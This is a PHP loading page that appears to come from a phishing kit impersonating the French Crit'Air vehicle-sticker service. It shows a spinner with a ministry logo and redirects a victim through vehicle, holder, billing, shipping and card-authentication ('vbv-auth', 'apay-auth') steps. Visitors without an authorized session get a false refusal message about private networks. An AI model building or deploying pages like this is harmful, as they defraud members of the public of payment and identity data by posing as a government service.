<?php 

session_start();

if(isset($_SESSION['authorized']))
{

   
  if($_GET['bring'] == "carinfos")
  {
    header('Refresh: 3; url=informations-vehicule.php?&enc='.md5(time()).'&p=0&dispatch='.sha1(time()));
  }

  if($_GET['bring'] == "billing")
  {
    header('Refresh: 5; url=informations-titulaire.php?&enc='.md5(time()).'&p=0&dispatch='.sha1(time()));
  }

  if($_GET['bring'] == "expedition-vignette")
  {
    header('Refresh: 3; url=expedition-vignette.php?&enc='.md5(time()).'&p=0&dispatch='.sha1(time()));
  }
  if($_GET['bring'] == "finished")
  {
     header('Refresh: 3; url=commande-valide.php?&enc='.md5(time()).'&p=0&dispatch='.sha1(time()));
  }
  if($_GET['bring'] == "apay-auth")
  {

  }

  if($_GET['bring'] == "vbv-auth")
  {

  }




?>



<html>

<style>
@import url('https://fonts.googleapis.com/css2?family=Bebas+Neue&display=swap');

p{
 font-family: 'Bebas Neue', cursive;

}
</style>

<head>
  <title>Chargement | Crit'Air</title>
      <meta name="viewport" content="width=device-width"/>
  </head>
  <body>
  
    <center>
      <?php 
      if($_GET['bring'] == "billing")
      {
        echo'<center> <img style="width: 250px; margin-top: 250px;" src="img/loupe.gif"></center><br><p>Veuillez patienter, nous examinons votre véhicule...</p>';

      }
      else{
        echo'<center> <img style="width: 90px; margin-top: 250px;" src="img/logo-ministere2.png"></center>
        <div style="margin-top: 50px;" class="loadingio-spinner-rolling-1foafbztm83"><div class="ldio-kwlss8n4oxj">
<div></div>
</div></div></center>

        ';

      }
      ?>
         
      
<style type="text/css">
@keyframes ldio-kwlss8n4oxj {
  0% { transform: translate(-50%,-50%) rotate(0deg); }
  100% { transform: translate(-50%,-50%) rotate(360deg); }
}
.ldio-kwlss8n4oxj div {
  position: absolute;
  width: 60px;
  height: 60px;
  border: 10px solid #3d67ae;
  border-top-color: transparent;
  border-radius: 50%;
}
.ldio-kwlss8n4oxj div {
  animation: ldio-kwlss8n4oxj 1s linear infinite;
  top: 50px;
  left: 50px
}
.loadingio-spinner-rolling-1foafbztm83 {
  width: 60px;
  height: 60px;
  display: inline-block;
  overflow: hidden;
  background: #ffffff;
}
.ldio-kwlss8n4oxj {
  width: 100%;
  height: 100%;
  position: relative;
  transform: translateZ(0) scale(0.6);
  backface-visibility: hidden;
  transform-origin: 0 0; /* see note above */
}
.ldio-kwlss8n4oxj div { box-sizing: content-box; }
/* generated by https://loading.io/ */
</style>

  </body>

</html>

<?php 
}
else{
die("LA REQUÊTE A ÉTÉ REFUSÉE : VÉRIFIEZ QUE VOUS N'ÊTES PAS CONNECTÉ À UN RÉSEAU PRIVÉ" );   
}
?>